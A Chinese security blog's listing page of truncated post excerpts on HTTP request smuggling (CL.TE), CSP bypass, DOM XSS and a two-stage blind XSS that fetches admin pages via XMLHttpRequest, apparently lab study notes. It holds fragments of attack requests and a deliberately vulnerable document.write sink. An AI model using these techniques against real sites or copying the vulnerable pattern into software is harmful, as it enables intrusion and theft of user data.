摘要：写个简单的jsp页面 <% String keykey = request.getParameter("keykey"); out.println("getContextPath:"+request.getContextPath()+"<br>"); out.println("getServletP 阅读全文

摘要：CL.TE 简介 前端通过Content-Length处理请求，通过反向代理或者负载均衡将请求转发到后端，后端Transfer-Encoding优先级较高，以TE处理请求造成安全问题。 检测 发送如下数据包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 阅读全文

摘要：最近看到一篇bypas csp的记录复现学习下 配置csp 这里直接设置html头达到配置csp的效果。 Content-Security-Policy: script-src 'self' 'unsafe-inline' 创建html，加载js，代码如下, <meta charset="utf-8 阅读全文

摘要：最直接的xss —-dom xss function trackSearch(query) { document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">'); } var query = (new 阅读全文

摘要：通过xss第一次取得网页内容，然后获取到管理员账号页面进行二次盲打。js需要保留script部分其余去除。 <html><p id='d1'></p> <script> function get(url) { try { var req = new XMLHttpRequest(); req.ope 阅读全文